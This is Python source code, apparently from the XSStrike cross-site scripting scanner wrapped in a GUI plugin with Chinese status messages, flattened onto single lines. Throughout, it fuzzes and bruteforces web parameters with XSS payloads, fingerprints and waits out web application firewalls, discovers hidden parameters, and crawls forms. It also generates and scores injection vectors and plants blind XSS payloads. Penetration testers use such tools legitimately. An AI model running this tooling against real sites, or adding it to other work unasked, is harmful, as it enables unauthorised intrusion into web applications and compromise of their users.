def bruteforcer(target, paramData, payloadList, encoding, headers, delay, timeout): GET, POST = (False, True) if paramData else (True, False) host = urlparse(target).netloc # Extracts host out of the url logger.debug('Parsed host to bruteforce: {}'.format(host)) url = getUrl(target, GET) logger.debug('Parsed url to bruteforce: {}'.format(url)) params = getParams(target, paramData, GET) logger.debug_json('Bruteforcer params:', params) if not params: logger.error('No parameters to test.') quit() for paramName in params.keys(): progress = 1 paramsCopy = copy.deepcopy(params) for payload in payloadList: logger.run('Bruteforcing %s[%s%s%s]%s: %i/%i\r' % (green, end, paramName, green, end, progress, len(payloadList))) if encoding: payload = encoding(unquote(payload)) paramsCopy[paramName] = payload response = requester(url, paramsCopy, headers, GET, delay, timeout).text if encoding: payload = encoding(payload) if payload in response: logger.info('%s %s' % (good, payload)) progress += 1 logger.no_format('')
def singleFuzz(target, paramData, encoding, headers, delay, timeout): GET, POST = (False, True) if paramData else (True, False) # If the user hasn't supplied the root url with http(s), we will handle it if not target.startswith('http'): try: response = requester('https://' + target, {}, headers, GET, delay, timeout) target = 'https://' + target except: target = 'http://' + target logger.debug('Single Fuzz target: {}'.format(target)) host = urlparse(target).netloc # Extracts host out of the url logger.debug('Single fuzz host: {}'.format(host)) url = getUrl(target, GET) logger.debug('Single fuzz url: {}'.format(url)) params = getParams(target, paramData, GET) logger.debug_json('Single fuzz params:', params) if not params: logger.error('No parameters to test.') quit() WAF = wafDetector(url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout) if WAF: logger.error('WAF detected: %s%s%s' % (green, WAF, end)) else: logger.good('WAF Status: %sOffline%s' % (green, end)) for paramName in params.keys(): logger.info('Fuzzing parameter: %s' % paramName) paramsCopy = copy.deepcopy(params) paramsCopy[paramName] = xsschecker fuzzer(url, paramsCopy, headers, GET, delay, timeout, WAF, encoding)
def fuzzer(url, params, headers, GET, delay, timeout, WAF, encoding): for fuzz in fuzzes: if delay == 0: delay = 0 t = delay + randint(delay, delay * 2) + counter(fuzz) sleep(t) try: if encoding: fuzz = encoding(unquote(fuzz)) data = replaceValue(params, xsschecker, fuzz, copy.deepcopy) response = requester(url, data, headers, GET, delay / 2, timeout) except: logger.error('WAF is dropping suspicious requests.') if delay == 0: logger.info('Delay has been increased to %s6%s seconds.' % (green, end)) delay += 6 limit = (delay + 1) * 50 timer = -1 while timer < limit: logger.info( '\rFuzzing will continue after %s%i%s seconds.\t\t\r' % (green, limit, end)) limit -= 1 sleep(1) try: requester(url, params, headers, GET, 0, 10) logger.good( 'Pheww! Looks like sleeping for %s%i%s seconds worked!' % (green, ((delay + 1) * 2), end)) except: logger.error( '\nLooks like WAF has blocked our IP Address. Sorry!') break if encoding: fuzz = encoding(fuzz) if fuzz.lower() in response.text.lower( ): # if fuzz string is reflected in the response result = ('%s[passed] %s' % (green, end)) # if the server returned an error (Maybe WAF blocked it) elif str(response.status_code)[:1] != '2': result = ('%s[blocked] %s' % (red, end)) else: # if the fuzz string was not reflected in the response completely result = ('%s[filtered]%s' % (yellow, end)) logger.info('%s %s' % (result, fuzz))
def checky(param, paraNames, url, headers, GET, delay, timeout): if param not in paraNames: logger.debug('Checking param: {}'.format(param)) response = requester(url, { param: xsschecker }, headers, GET, delay, timeout).text if '\'%s\'' % xsschecker in response or '"%s"' % xsschecker in response or ' %s ' % xsschecker in response: paraNames[param] = '' logger.good('Valid parameter found: %s%s', green, param)
def rec(target): processed.add(target) printableTarget = '/'.join(target.split('/')[3:]) if len(printableTarget) > 40: printableTarget = printableTarget[-40:] else: printableTarget = (printableTarget + (' ' * (40 - len(printableTarget)))) logger.run('Parsing %s\r' % printableTarget) url = getUrl(target, True) params = getParams(target, '', True) if '=' in target: # if there's a = in the url, there should be GET parameters inps = [] for name, value in params.items(): inps.append({'name': name, 'value': value}) forms.append({0: {'action': url, 'method': 'get', 'inputs': inps}}) response = requester(url, params, headers, True, delay, timeout,signal=signal).text retireJs(url, response) if not skipDOM: highlighted = dom(response) clean_highlighted = ''.join([re.sub(r'^\d+\s+', '', line) for line in highlighted]) if highlighted and clean_highlighted not in checkedDOMs: checkedDOMs.append(clean_highlighted) logger.good('Potentially vulnerable objects found at %s' % url) logger.red_line(level='good') for line in highlighted: logger.no_format(line, level='good') logger.red_line(level='good') forms.append(zetanize(response)) matches = re.findall(r'<[aA].*href=["\']{0,1}(.*?)["\']', response) for link in matches: # iterate over the matches # remove everything after a "#" to deal with in-page anchors link = link.split('#')[0] if link.endswith(('.pdf', '.png', '.jpg', '.jpeg', '.xls', '.xml', '.docx', '.doc')): pass else: if link[:4] == 'http': if link.startswith(main_url): storage.add(link) elif link[:2] == '//': if link.split('/')[2].startswith(host): storage.add(schema + link) elif link[:1] == '/': storage.add(main_url + link) else: storage.add(main_url + '/' + link)
def wafDetector(url, params, headers, GET, delay, timeout): with open(sys.path[0] + '/plugins/XSStrike/db/wafSignatures.json', 'r') as file: wafSignatures = json.load(file) # a payload which is noisy enough to provoke the WAF noise = '<script>alert("XSS")</script>' params['xss'] = noise # Opens the noise injected payload response = requester(url, params, headers, GET, delay, timeout) page = response.text code = str(response.status_code) headers = str(response.headers) logger.debug('Waf Detector code: {}'.format(code)) logger.debug_json('Waf Detector headers:', response.headers) if int(code) >= 400: bestMatch = [0, None] for wafName, wafSignature in wafSignatures.items(): score = 0 pageSign = wafSignature['page'] codeSign = wafSignature['code'] headersSign = wafSignature['headers'] if pageSign: if re.search(pageSign, page, re.I): score += 1 if codeSign: if re.search(codeSign, code, re.I): score += 0.5 # increase the overall score by a smaller amount because http codes aren't strong indicators if headersSign: if re.search(headersSign, headers, re.I): score += 1 # if the overall score of the waf is higher than the previous one if score > bestMatch[0]: del bestMatch[:] # delete the previous one bestMatch.extend([score, wafName]) # and add this one if bestMatch[0] != 0: return bestMatch[1] else: return None else: return None
def checker(url, params, headers, GET, delay, payload, positions, timeout, encoding): checkString = 'st4r7s' + payload + '3nd' if encoding: checkString = encoding(unquote(checkString)) response = requester( url, replaceValue(params, xsschecker, checkString, copy.deepcopy), headers, GET, delay, timeout).text.lower() reflectedPositions = [] for match in re.finditer('st4r7s', response): reflectedPositions.append(match.start()) filledPositions = fillHoles(positions, reflectedPositions) # Itretating over the reflections num = 0 efficiencies = [] for position in filledPositions: allEfficiencies = [] try: reflected = response[ reflectedPositions[num]:reflectedPositions[num] + len(checkString)] efficiency = fuzz.partial_ratio(reflected, checkString.lower()) allEfficiencies.append(efficiency) except IndexError: pass if position: reflected = response[position:position + len(checkString)] if encoding: checkString = encoding(checkString.lower()) efficiency = fuzz.partial_ratio(reflected, checkString) if reflected[:-2] == ( '\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')): efficiency = 90 allEfficiencies.append(efficiency) efficiencies.append(max(allEfficiencies)) else: efficiencies.append(0) num += 1 return list(filter(None, efficiencies))
def retireJs(url, response): scripts = js_extractor(response) for script in scripts: if script not in getVar('checkedScripts'): updateVar('checkedScripts', script, 'add') uri = handle_anchor(url, script) response = requester(uri, '', getVar('headers'), True, getVar('delay'), getVar('timeout')).text result = main_scanner(uri, response) if result: logger.red_line() logger.good('Vulnerable component: ' + result['component'] + ' v' + result['version']) logger.info('Component location: %s' % uri) details = result['vulnerabilities'] logger.info('Total vulnerabilities: %i' % len(details)) for detail in details: logger.info('%sSummary:%s %s' % (green, end, detail['identifiers']['summary'])) logger.info('Severity: %s' % detail['severity']) logger.info('CVE: %s' % detail['identifiers']['CVE'][0]) logger.red_line()
def arjun(url, GET, headers, delay, timeout): paraNames = {} response = requester(url, {}, headers, GET, delay, timeout).text matches = re.findall( r'<input.*?name=\'(.*?)\'.*?>|<input.*?name="(.*?)".*?>', response) for match in matches: try: foundParam = match[1] except UnicodeDecodeError: continue logger.good( 'Heuristics found a potentially valid parameter: %s%s%s. Priortizing it.' % (green, foundParam, end)) if foundParam not in blindParams: blindParams.insert(0, foundParam) threadpool = concurrent.futures.ThreadPoolExecutor(max_workers=threadCount) futures = (threadpool.submit(checky, param, paraNames, url, headers, GET, delay, timeout) for param in blindParams) for i, _ in enumerate(concurrent.futures.as_completed(futures)): if i + 1 == len(blindParams) or (i + 1) % threadCount == 0: logger.info('Progress: %i/%i\r' % (i + 1, len(blindParams))) return paraNames
def scan(payload_signal, signal, target, paramData, encoding, headers, delay, timeout, skipDOM, find, skip): GET, POST = (False, True) if paramData else (True, False) # If the user hasn't supplied the root url with http(s), we will handle it if not target.startswith('http'): try: response = requester('https://' + target, {}, headers, GET, delay, timeout) target = 'https://' + target except: target = 'http://' + target logger.debug('Scan target: {}'.format(target)) response = requester(target, {}, headers, GET, delay, timeout).text if not skipDOM: logger.run('Checking for DOM vulnerabilities') signal[str, str].emit('[+] 检测DOM XSS', 'green') highlighted = dom(response) if highlighted: logger.good('Potentially vulnerable objects found') signal[str, str].emit('[+] 发现DOM XSS', 'red') logger.red_line(level='good') for line in highlighted: logger.no_format(line, level='good') signal[str, str].emit('[+] %s' % line, 'red') logger.red_line(level='good') host = urlparse(target).netloc # Extracts host out of the url logger.debug('Host to scan: {}'.format(host)) url = getUrl(target, GET) logger.debug('Url to scan: {}'.format(url)) params = getParams(target, paramData, GET) logger.debug_json('Scan parameters:', params) if find: params = arjun(url, GET, headers, delay, timeout) if not params: logger.error('No parameters to test.') quit() WAF = wafDetector(url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout) if WAF: # logger.error('WAF detected: %s%s%s' % (green, WAF, end)) signal[str, str].emit('[+] WAF 状态: 被保护 -> %s' % (WAF), 'red') else: # logger.good('WAF Status: %sOffline%s' % (green, end)) signal[str, str].emit('[+] WAF 状态: 无WAF', 'red') for paramName in params.keys(): paramsCopy = copy.deepcopy(params) # logger.info('Testing parameter: %s' % paramName) signal[str, str].emit('[+] 测试参数: %s' % paramName, 'green') if encoding: paramsCopy[paramName] = encoding(xsschecker) else: paramsCopy[paramName] = xsschecker response = requester(url, paramsCopy, headers, GET, delay, timeout) occurences = htmlParser(response, encoding) positions = occurences.keys() logger.debug('Scan occurences: {}'.format(occurences)) if not occurences: # logger.error('No reflection found') signal[str, str].emit('[-] 没有发现反射点', 'green') continue else: # logger.info('Reflections found: %i' % len(occurences)) signal[str, str].emit('[+] 发现反射点: %i' % len(occurences), 'red') logger.run('Analysing reflections') signal[str, str].emit('[+] 分析反射点', 'green') efficiencies = filterChecker(url, paramsCopy, headers, GET, delay, occurences, timeout, encoding) logger.debug('Scan efficiencies: {}'.format(efficiencies)) # logger.run('Generating payloads') signal[str, str].emit('[+] 创建payload', 'green') vectors = generator(occurences, response.text) total = 0 for v in vectors.values(): total += len(v) if total == 0: logger.error('No vectors were crafted.') continue logger.info('Payloads generated: %i' % total) signal[str, str].emit('[+] payload已创建: %i' % total, 'green') progress = 0 for confidence, vects in vectors.items(): for vect in vects: if plugins.XSStrike.core.config.wait == 1: return if plugins.XSStrike.core.config.globalVariables['path']: vect = vect.replace('/', '%2F') loggerVector = vect progress += 1 logger.run('Progress: %i/%i\r' % (progress, total)) if not GET: vect = unquote(vect) efficiencies = checker(url, paramsCopy, headers, GET, delay, vect, positions, timeout, encoding) if not efficiencies: for i in range(len(occurences)): efficiencies.append(0) bestEfficiency = max(efficiencies) if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95): logger.red_line() signal[str, str].emit('-' * 50, 'red') logger.good('Payload: %s' % loggerVector) payload_signal[str].emit(paramName + ': ' + html.escape(loggerVector)) signal[str, str].emit( '[+] payload: %s' % html.escape(loggerVector), 'red') logger.info('Efficiency: %i' % bestEfficiency) signal[str, str].emit('[+] 效率: %i' % bestEfficiency, 'red') logger.info('Confidence: %i' % confidence) signal[str, str].emit('[+] 成功率: %i' % confidence, 'red') if not skip: choice = input( '%s Would you like to continue scanning? [y/N] ' % que).lower() if choice != 'y': quit() elif bestEfficiency > minEfficiency: logger.red_line() signal[str, str].emit('-' * 50, 'red') logger.good('Payload: %s' % loggerVector) payload_signal[str].emit(paramName + ': ' + html.escape(loggerVector)) signal[str, str].emit( '[+] payload: %s' % html.escape(loggerVector), 'red') logger.info('Efficiency: %i' % bestEfficiency) signal[str, str].emit('[+] 效率: %i' % bestEfficiency, 'red') logger.info('Confidence: %i' % confidence) signal[str, str].emit('[+] 成功率: %i' % confidence, 'red') logger.no_format('')
def crawl(scheme, host, main_url, form, blindXSS, blindPayload, headers, delay, timeout, encoding, signal): if form: for each in form.values(): url = each['action'] if url: if url.startswith(main_url): pass elif url.startswith('//') and url[2:].startswith(host): url = scheme + '://' + url[2:] elif url.startswith('/'): url = scheme + '://' + host + url elif re.match(r'\w', url[0]): url = scheme + '://' + host + '/' + url if url not in plugins.XSStrike.core.config.globalVariables[ 'checkedForms']: plugins.XSStrike.core.config.globalVariables[ 'checkedForms'][url] = [] method = each['method'] GET = True if method == 'get' else False inputs = each['inputs'] paramData = {} for one in inputs: paramData[one['name']] = one['value'] for paramName in paramData.keys(): if paramName not in plugins.XSStrike.core.config.globalVariables[ 'checkedForms'][url]: plugins.XSStrike.core.config.globalVariables[ 'checkedForms'][url].append(paramName) paramsCopy = copy.deepcopy(paramData) paramsCopy[paramName] = xsschecker response = requester(url, paramsCopy, headers, GET, delay, timeout) occurences = htmlParser(response, encoding) positions = occurences.keys() efficiencies = filterChecker( url, paramsCopy, headers, GET, delay, occurences, timeout, encoding) vectors = generator(occurences, response.text) if vectors: for confidence, vects in vectors.items(): try: payload = list(vects)[0] logger.vuln( 'Vulnerable webpage: %s%s%s' % (green, url, end)) logger.vuln( 'Vector for %s%s%s: %s' % (green, paramName, end, payload)) # # signal[str, str].emit( '[+] 漏洞页面发现: %s' % url, 'red') signal[str, str].emit( '[+] 向量: %s : %s' % (paramName, html.escape(payload)), 'red') break except IndexError: pass if blindXSS and blindPayload: paramsCopy[paramName] = blindPayload requester(url, paramsCopy, headers, GET, delay, timeout)